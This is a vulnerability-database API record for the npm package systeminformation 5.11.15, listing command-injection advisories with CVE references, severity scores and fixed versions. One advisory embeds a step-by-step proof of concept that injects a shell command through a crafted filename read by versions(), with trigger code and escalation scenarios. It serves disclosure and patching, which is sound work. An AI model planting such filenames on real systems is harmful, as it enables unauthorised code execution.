Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/677734?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/677734?format=api", "purl": "pkg:npm/systeminformation@5.11.15", "type": "npm", "namespace": "", "name": "systeminformation", "version": "5.11.15", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "5.31.0", "latest_non_vulnerable_version": "5.31.6", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50225?format=api", "vulnerability_id": "VCID-2rnv-d3tb-hug9", "summary": "Systeminformation has a Command Injection via unsanitized interface parameter in wifi.js retry path\nA command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26280.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26280.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26280", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.09016", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26280" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:36Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441121", "reference_id": "2441121", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441121" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26280", "reference_id": "CVE-2026-26280", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26280" }, { "reference_url": "https://github.com/advisories/GHSA-9c88-49p5-5ggf", "reference_id": "GHSA-9c88-49p5-5ggf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9c88-49p5-5ggf" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf", "reference_id": "GHSA-9c88-49p5-5ggf", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:36Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74120?format=api", "purl": "pkg:npm/systeminformation@5.30.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kg9c-n3a4-9uh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.30.8" } ], "aliases": [ "CVE-2026-26280", "GHSA-9c88-49p5-5ggf" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2rnv-d3tb-hug9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46072?format=api", "vulnerability_id": "VCID-3vuy-w9kw-7fdy", "summary": "systeminformation SSID Command Injection Vulnerability\n### Impact\nSSID Command Injection Vulnerability\n\n### Patches\nProblem was fixed with a parameter check. Please upgrade to version >= 5.21.7, Version 4 was not affected\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize parameter strings that are passed to wifiConnections(), wifiNetworks() (string only)\n\n### References\nSee also https://systeminformation.io/security.html", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-42810", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02061", "scoring_system": "epss", "scoring_elements": "0.8425", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-42810" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/7972565812ccb2a610a22911c54c3446f4171392", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-09-24T14:49:28Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/7972565812ccb2a610a22911c54c3446f4171392" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42810", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42810" }, { "reference_url": "https://systeminformation.io/security.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-09-24T14:49:28Z/" } ], "url": "https://systeminformation.io/security.html" }, { "reference_url": "https://github.com/advisories/GHSA-gx6r-qc2v-3p3v", "reference_id": "GHSA-gx6r-qc2v-3p3v", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-gx6r-qc2v-3p3v" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-gx6r-qc2v-3p3v", "reference_id": "GHSA-gx6r-qc2v-3p3v", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-09-24T14:49:28Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-gx6r-qc2v-3p3v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/67079?format=api", "purl": "pkg:npm/systeminformation@5.21.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2rnv-d3tb-hug9" }, { "vulnerability": "VCID-99un-1enx-5uhv" }, { "vulnerability": "VCID-kg9c-n3a4-9uh1" }, { "vulnerability": "VCID-wd8e-yyex-vqff" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.21.7" } ], "aliases": [ "CVE-2023-42810", "GHSA-gx6r-qc2v-3p3v" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3vuy-w9kw-7fdy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56379?format=api", "vulnerability_id": "VCID-99un-1enx-5uhv", "summary": "Systeminformation has command injection vulnerability in getWindowsIEEE8021x (SSID)\nThe SSID is not sanitized when before it is passed as a parameter to cmd.exe in the `getWindowsIEEE8021x` function. This means that malicious content in the SSID can be executed as OS commands.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-56334.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-56334.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-56334", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.04955", "scoring_system": "epss", "scoring_elements": "0.8985", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-56334" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/f7af0a67b78e7894335a6cad510566a25e06ae41", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-24T16:32:16Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/f7af0a67b78e7894335a6cad510566a25e06ae41" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333587", "reference_id": "2333587", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333587" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56334", "reference_id": "CVE-2024-56334", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56334" }, { "reference_url": "https://github.com/advisories/GHSA-cvv5-9h9w-qp2m", "reference_id": "GHSA-cvv5-9h9w-qp2m", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-cvv5-9h9w-qp2m" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m", "reference_id": "GHSA-cvv5-9h9w-qp2m", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-24T16:32:16Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3374", "reference_id": "RHSA-2025:3374", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3374" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83606?format=api", "purl": "pkg:npm/systeminformation@5.23.7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.23.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/791994?format=api", "purl": "pkg:npm/systeminformation@5.23.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2rnv-d3tb-hug9" }, { "vulnerability": "VCID-kg9c-n3a4-9uh1" }, { "vulnerability": "VCID-wd8e-yyex-vqff" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.23.8" } ], "aliases": [ "CVE-2024-56334", "GHSA-cvv5-9h9w-qp2m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-99un-1enx-5uhv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50231?format=api", "vulnerability_id": "VCID-kg9c-n3a4-9uh1", "summary": "# Command Injection via Unsanitized `locate` Output in `versions()` — systeminformation\n\n**Package:** systeminformation (npm) \n**Tested Version:** 5.30.7 \n**Affected Platform:** Linux \n**Author:** Sebastian Hildebrandt \n**Weekly Downloads:** ~5,000,000+ \n**Repository:** https://github.com/sebhildebrandt/systeminformation \n**Severity:** Medium \n**CWE:** CWE-78 (OS Command Injection) \n\n---\n\n### The Vulnerable Code Path\n\nInside the `versions()` function, when detecting the PostgreSQL version on Linux, the code does this:\n\n```javascript\n// lib/osinfo.js — lines 770-776\n\nexec('locate bin/postgres', (error, stdout) => {\n if (!error) {\n const postgresqlBin = stdout.toString().split('\\n').sort();\n if (postgresqlBin.length) {\n exec(postgresqlBin[postgresqlBin.length - 1] + ' -V', (error, stdout) => {\n // parses version string...\n });\n }\n }\n});\n```\n\nHere's what happens step by step:\n\n1. It runs `locate bin/postgres` to search the filesystem for PostgreSQL binaries\n2. It splits the output by newline and sorts the results alphabetically\n3. It takes the **last element** (highest alphabetically)\n4. It concatenates that path directly into a new `exec()` call with `+ ' -V'`\n\n**No `sanitizeShellString()`. No path validation. No `execFile()`. Raw string concatenation into `exec()`.**\n\nThe `locate` command reads from a system-wide database (`plocate.db` or `mlocate.db`) that indexes all filenames on the system. If any indexed filename contains shell metacharacters — specifically semicolons — those characters will be interpreted by the shell when passed to `exec()`.\n\n---\n\n## Exploitation\n\n### Prerequisites\n\nFor this vulnerability to be exploitable, the following conditions must be met:\n\n1. **Target system runs Linux** — the vulnerable code path is inside an `if (_linux)` block\n2. **`locate` / `plocate` is installed** — common on Ubuntu, Debian, Fedora, RHEL\n3. **PostgreSQL binary exists in the locate database** — so `locate bin/postgres` returns results (otherwise the code falls through to a safe `psql -V` fallback)\n4. **The attacker can create files on the filesystem** — in any directory that gets indexed by `updatedb`\n5. **The locate database gets updated** — `updatedb` runs daily via systemd timer (`plocate-updatedb.timer`) or cron on most distros\n\n### Step 1 — Verify the Environment\n\nOn the target machine, confirm locate is available and running:\n\n```\nwhich locate\n# /usr/bin/locate\n\nsystemctl list-timers | grep plocate\n# plocate-updatedb.timer plocate-updatedb.service\n# (runs daily, typically around 1-2 AM)\n```\n\nCheck who owns the locate database:\n\n```\nls -la /var/lib/plocate/plocate.db\n# -rw-r----- 1 root plocate 18851616 Feb 14 01:50 /var/lib/plocate/plocate.db\n```\n\nDatabase is root-owned and updated by root. Regular users cannot update it directly, but `updatedb` runs on a daily schedule and indexes all readable files.\n\n### Step 2 — Craft the Malicious File Path\n\nThe key insight is that **Linux allows semicolons in filenames**, and `exec()` passes strings through `/bin/sh -c` which **interprets semicolons as command separators**.\n\nCreate a file whose path contains an injected command:\n\n```\nmkdir -p \"/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin\"\ntouch \"/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\"\n```\n\nVerify it exists:\n\n```\nfind /var/tmp -name postgres\n# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\nThis file needs to end up in the `locate` database. On a real system, this happens automatically when `updatedb` runs overnight. For testing purposes:\n\n```\nsudo updatedb\n```\n\nThen verify locate picks it up:\n\n```\nlocate bin/postgres\n# /usr/lib/postgresql/14/bin/postgres\n# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\n### Step 3 — Understand the Sort Trick\n\nThe vulnerable code sorts the locate results alphabetically and takes the **last** element:\n\n```javascript\nconst postgresqlBin = stdout.toString().split('\\n').sort();\nexec(postgresqlBin[postgresqlBin.length - 1] + ' -V', ...);\n```\n\nAlphabetically, `/var/` sorts **after** `/usr/`. So our malicious path naturally becomes the selected one:\n\n```\nNode.js sort order:\n [0] /usr/lib/postgresql/14/bin/postgres ← legitimate\n [1] /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres ← selected (last)\n```\n\nQuick verification:\n\n```\nnode -e \"\nconst paths = [\n '/usr/lib/postgresql/14/bin/postgres',\n '/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'\n];\nconsole.log('Sorted:', paths.sort());\nconsole.log('Selected (last):', paths[paths.length - 1]);\n\"\n```\n\nOutput:\n\n```\nSorted: [\n '/usr/lib/postgresql/14/bin/postgres',\n '/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'\n]\nSelected (last): /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\n### Step 4 — Trigger the Vulnerability\n\nNow when any application using systeminformation calls `versions()` requesting the postgresql version, the injected command fires:\n\n```javascript\nconst si = require('systeminformation');\n\n// This is a normal, innocent API call\nsi.versions('postgresql').then(data => {\n console.log(data);\n});\n```\n\nInternally, the library builds and executes this command:\n\n```\n/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres -V\n```\n\nThe shell (`/bin/sh -c`) interprets this as three separate commands:\n\n```\n/var/tmp/x → fails silently (not executable)\ntouch /tmp/SI_RCE_PROOF → ATTACKER'S COMMAND EXECUTES\n/bin/postgres -V → runs normally, returns version\n```\n\n### Step 5 — Verify Code Execution\n\n```\nls -la /tmp/SI_RCE_PROOF\n# -rw-rw-r-- 1 appuser appuser 0 Feb 14 15:30 /tmp/SI_RCE_PROOF\n```\n\nThe file exists. Arbitrary command execution confirmed.\n\nThe injected command runs with **whatever privileges the Node.js process has**. In a monitoring dashboard or backend API context, that's typically the application service account.\n\n---\n\n## Real-World Attack Scenarios\n\n### Scenario 1 — Shared Hosting / Multi-Tenant Server\n\nA low-privileged user on a shared server creates the malicious file in `/tmp` or their home directory. The hosting provider runs a monitoring agent that uses `systeminformation` for health dashboards. Next time the agent calls `versions()`, the attacker's command executes under the monitoring agent's (higher-privileged) service account.\n\n### Scenario 2 — CI/CD Pipeline Poisoning\n\nA malicious contributor submits a PR that includes a build step creating files with crafted names. If the CI pipeline uses `systeminformation` for environment reporting (common in test harnesses and build dashboards), the injected commands execute in the CI runner context — potentially leaking secrets, tokens, and deployment keys.\n\n### Scenario 3 — Container / Kubernetes Escape\n\nIn containerized environments where `/var` or `/tmp` sits on a shared volume, a compromised container creates the malicious file. When the host-level monitoring agent (running `systeminformation`) calls `versions()`, the injected command executes on the host, breaking out of the container boundary.\n\n---\n\n## Suggested Fix\n\nReplace `exec()` with `execFile()` for the PostgreSQL binary version check. `execFile()` does not spawn a shell, so metacharacters in the path are treated as literal characters:\n\n```javascript\nconst { execFile } = require('child_process');\n\nexec('locate bin/postgres', (error, stdout) => {\n if (!error) {\n const postgresqlBin = stdout.toString().split('\\n')\n .filter(p => p.trim().length > 0)\n .sort();\n if (postgresqlBin.length) {\n execFile(postgresqlBin[postgresqlBin.length - 1], ['-V'], (error, stdout) => {\n // ... parse version\n });\n }\n }\n});\n```\n\nAdditionally, the locate output should be validated against a safe path pattern before use:\n\n```javascript\nconst safePath = /^[a-zA-Z0-9/_.-]+$/;\nconst postgresqlBin = stdout.toString().split('\\n')\n .filter(p => safePath.test(p.trim()))\n .sort();\n```\n\n---\n\n## Disclosure\n\n- **Reported via:** GitHub Private Security Advisory\n- **Advisory URL:** https://github.com/sebhildebrandt/systeminformation/security/advisories/new\n- **Security Contact:** security@systeminformation.io", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26318.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26318.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26318", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05795", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26318" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/b67d3715eec881038ccbaace2f2711419ac3e107", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:34Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/b67d3715eec881038ccbaace2f2711419ac3e107" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441124", "reference_id": "2441124", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441124" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26318", "reference_id": "CVE-2026-26318", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26318" }, { "reference_url": "https://github.com/advisories/GHSA-5vv4-hvf7-2h46", "reference_id": "GHSA-5vv4-hvf7-2h46", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5vv4-hvf7-2h46" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-5vv4-hvf7-2h46", "reference_id": "GHSA-5vv4-hvf7-2h46", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:34Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-5vv4-hvf7-2h46" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74123?format=api", "purl": "pkg:npm/systeminformation@5.31.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.31.0" } ], "aliases": [ "CVE-2026-26318", "GHSA-5vv4-hvf7-2h46" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kg9c-n3a4-9uh1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49455?format=api", "vulnerability_id": "VCID-wd8e-yyex-vqff", "summary": "systeminformation has a Command Injection vulnerability in fsSize() function on Windows\nThe `fsSize()` function in `systeminformation` is vulnerable to **OS Command Injection (CWE-78)** on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.\n\n**Affected Platforms:** Windows only\n\n**CVSS Breakdown:**\n- **Attack Vector (AV:N):** Network - if used in a web application/API\n- **Attack Complexity (AC:H):** High - requires application to pass user input to `fsSize()`\n- **Privileges Required (PR:N):** None - no authentication required at library level\n- **User Interaction (UI:N):** None\n- **Scope (S:U):** Unchanged - executes within Node.js process context\n- **Confidentiality/Integrity/Availability (C:H/I:H/A:H):** High impact if exploited\n\n> **Note:** The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable.\n\n---", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68154.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68154.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68154", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.15424", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68154" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-12-17T14:50:36Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2422883", "reference_id": "2422883", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2422883" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68154", "reference_id": "CVE-2025-68154", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68154" }, { "reference_url": "https://github.com/advisories/GHSA-wphj-fx3q-84ch", "reference_id": "GHSA-wphj-fx3q-84ch", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wphj-fx3q-84ch" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch", "reference_id": "GHSA-wphj-fx3q-84ch", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-12-17T14:50:36Z/" } ], "url": 